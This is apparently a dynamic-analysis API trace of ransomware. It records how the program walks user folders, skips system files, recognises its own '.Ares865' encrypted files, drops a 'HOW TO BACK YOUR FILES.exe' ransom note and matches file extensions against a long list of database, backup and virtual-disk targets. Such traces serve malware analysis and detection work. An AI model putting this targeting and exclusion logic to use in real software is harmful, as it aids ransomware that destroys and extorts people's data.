[0060.140] lstrlenW (lpString="Application Data") returned 16 [0060.140] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\*") returned 38 [0060.140] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0060.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0060.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d2f68 [0060.140] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b30 [0060.140] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0060.140] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.140] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0060.140] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0060.140] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0060.140] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0060.140] lstrcmpiW (lpString1="History", lpString2="bootmgr") returned 1 [0060.140] lstrcmpiW (lpString1="History", lpString2="temp") returned -1 [0060.140] lstrcmpiW (lpString1="History", lpString2="pagefile.sys") returned -1 [0060.140] lstrcmpiW (lpString1="History", lpString2="boot") returned 1 [0060.140] lstrcmpiW (lpString1="History", lpString2="ids.txt") returned -1 [0060.140] lstrcmpiW (lpString1="History", lpString2="ntuser.dat") returned -1 [0060.141] lstrcmpiW (lpString1="History", lpString2="perflogs") returned -1 [0060.141] lstrcmpiW (lpString1="History", lpString2="MSBuild") returned -1 [0060.141] lstrlenW (lpString="History") returned 7 [0060.141] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data") returned 53 [0060.141] lstrcpyW (in: lpString1=0x2cce44a, lpString2="History" | out: lpString1="History") returned="History" [0060.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0060.141] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f2098 [0060.141] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0060.141] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.141] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.141] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x66b2700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbdaf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db.Ares865", cAlternateFileName="ICONCA~1.ARE")) returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="aoldtz.exe") returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2=".") returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="..") returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="windows") returned -1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="bootmgr") returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="temp") returned -1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="pagefile.sys") returned -1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="boot") returned 1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="ids.txt") returned -1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="ntuser.dat") returned -1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="perflogs") returned -1 [0060.141] lstrcmpiW (lpString1="IconCache.db.Ares865", lpString2="MSBuild") returned -1 [0060.141] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0060.141] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History") returned 44 [0060.141] lstrcpyW (in: lpString1=0x2cce44a, lpString2="IconCache.db.Ares865" | out: lpString1="IconCache.db.Ares865") returned="IconCache.db.Ares865" [0060.141] lstrlenW (lpString="IconCache.db.Ares865") returned 20 [0060.141] lstrlenW (lpString="Ares865") returned 7 [0060.141] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0060.141] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0060.141] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.141] lstrcmpiW (lpString1="Microsoft", lpString2="aoldtz.exe") returned 1 [0060.141] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0060.141] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0060.141] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0060.141] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="temp") returned -1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="ntuser.dat") returned -1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="perflogs") returned -1 [0060.142] lstrcmpiW (lpString1="Microsoft", lpString2="MSBuild") returned -1 [0060.142] lstrlenW (lpString="Microsoft") returned 9 [0060.142] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\IconCache.db.Ares865") returned 57 [0060.142] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0060.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0060.142] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f2100 [0060.142] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7b70 [0060.142] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0060.142] lstrcmpiW (lpString1="Temp", lpString2="temp") returned 0 [0060.142] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="aoldtz.exe") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="windows") returned -1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="bootmgr") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="temp") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="pagefile.sys") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="boot") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ids.txt") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ntuser.dat") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="perflogs") returned 1 [0060.142] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="MSBuild") returned 1 [0060.142] lstrlenW (lpString="Temporary Internet Files") returned 24 [0060.143] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft") returned 46 [0060.143] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0060.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0060.143] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0518 [0060.143] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0060.143] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0060.143] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0060.143] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0060.143] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files" [0060.143] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.143] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0060.143] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files") returned 61 [0060.143] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files" [0060.143] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.143] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.144] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.144] GetLastError () returned 0x0 [0060.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.144] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.144] CloseHandle (hObject=0x12c) returned 1 [0060.144] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.144] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.144] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.145] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.145] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.145] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.145] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a3658a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.145] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.145] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.145] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Content.IE5", cAlternateFileName="")) returned 1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="aoldtz.exe") returned 1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2=".") returned 1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="..") returned 1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="windows") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="bootmgr") returned 1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="temp") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="pagefile.sys") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="boot") returned 1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="ids.txt") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="ntuser.dat") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="perflogs") returned -1 [0060.145] lstrcmpiW (lpString1="Content.IE5", lpString2="MSBuild") returned -1 [0060.145] lstrlenW (lpString="Content.IE5") returned 11 [0060.145] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\*") returned 63 [0060.145] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Content.IE5" | out: lpString1="Content.IE5") returned="Content.IE5" [0060.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0060.145] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x334fc8 [0060.145] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0060.145] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe710360, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.145] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.145] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.145] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.145] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.145] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.146] lstrlenW (lpString="desktop.ini") returned 11 [0060.146] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned 73 [0060.146] lstrcpyW (in: lpString1=0x2cce47c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.146] lstrlenW (lpString="desktop.ini") returned 11 [0060.146] lstrlenW (lpString="Ares865") returned 7 [0060.146] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.146] lstrlenW (lpString=".dll") returned 4 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.146] lstrlenW (lpString=".lnk") returned 4 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.146] lstrlenW (lpString=".ini") returned 4 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.146] lstrlenW (lpString=".sys") returned 4 [0060.146] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.146] lstrlenW (lpString="desktop.ini") returned 11 [0060.146] lstrlenW (lpString="bak") returned 3 [0060.146] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.146] lstrlenW (lpString="ba_") returned 3 [0060.146] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.146] lstrlenW (lpString="dbb") returned 3 [0060.146] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.146] lstrlenW (lpString="vmdk") returned 4 [0060.146] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.146] lstrlenW (lpString="rar") returned 3 [0060.146] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.146] lstrlenW (lpString="zip") returned 3 [0060.146] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.146] lstrlenW (lpString="tgz") returned 3 [0060.146] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.147] lstrlenW (lpString="vbox") returned 4 [0060.147] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.147] lstrlenW (lpString="vdi") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.147] lstrlenW (lpString="vhd") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.147] lstrlenW (lpString="vhdx") returned 4 [0060.147] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.147] lstrlenW (lpString="avhd") returned 4 [0060.147] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.147] lstrlenW (lpString="db") returned 2 [0060.147] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.147] lstrlenW (lpString="db2") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.147] lstrlenW (lpString="db3") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.147] lstrlenW (lpString="dbf") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.147] lstrlenW (lpString="mdf") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.147] lstrlenW (lpString="mdb") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.147] lstrlenW (lpString="sql") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.147] lstrlenW (lpString="sqlite") returned 6 [0060.147] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.147] lstrlenW (lpString="sqlite3") returned 7 [0060.147] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.147] lstrlenW (lpString="sqlitedb") returned 8 [0060.147] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.147] lstrlenW (lpString="xml") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.147] lstrlenW (lpString="$er") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.147] lstrlenW (lpString="4dd") returned 3 [0060.147] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.147] lstrlenW (lpString="4dl") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.148] lstrlenW (lpString="^^^") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.148] lstrlenW (lpString="abs") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.148] lstrlenW (lpString="abx") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.148] lstrlenW (lpString="accdb") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.148] lstrlenW (lpString="accdc") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.148] lstrlenW (lpString="accde") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.148] lstrlenW (lpString="accdr") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.148] lstrlenW (lpString="accdt") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.148] lstrlenW (lpString="accdw") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.148] lstrlenW (lpString="accft") returned 5 [0060.148] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.148] lstrlenW (lpString="adb") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.148] lstrlenW (lpString="adb") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.148] lstrlenW (lpString="ade") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.148] lstrlenW (lpString="adf") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.148] lstrlenW (lpString="adn") returned 3 [0060.148] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.148] lstrlenW (lpString="adp") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.149] lstrlenW (lpString="alf") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.149] lstrlenW (lpString="ask") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.149] lstrlenW (lpString="btr") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.149] lstrlenW (lpString="cat") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.149] lstrlenW (lpString="cdb") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.149] lstrlenW (lpString="ckp") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.149] lstrlenW (lpString="cma") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.149] lstrlenW (lpString="cpd") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.149] lstrlenW (lpString="dacpac") returned 6 [0060.149] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.149] lstrlenW (lpString="dad") returned 3 [0060.149] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.149] lstrlenW (lpString="dadiagrams") returned 10 [0060.149] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.149] lstrlenW (lpString="daschema") returned 8 [0060.149] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.149] 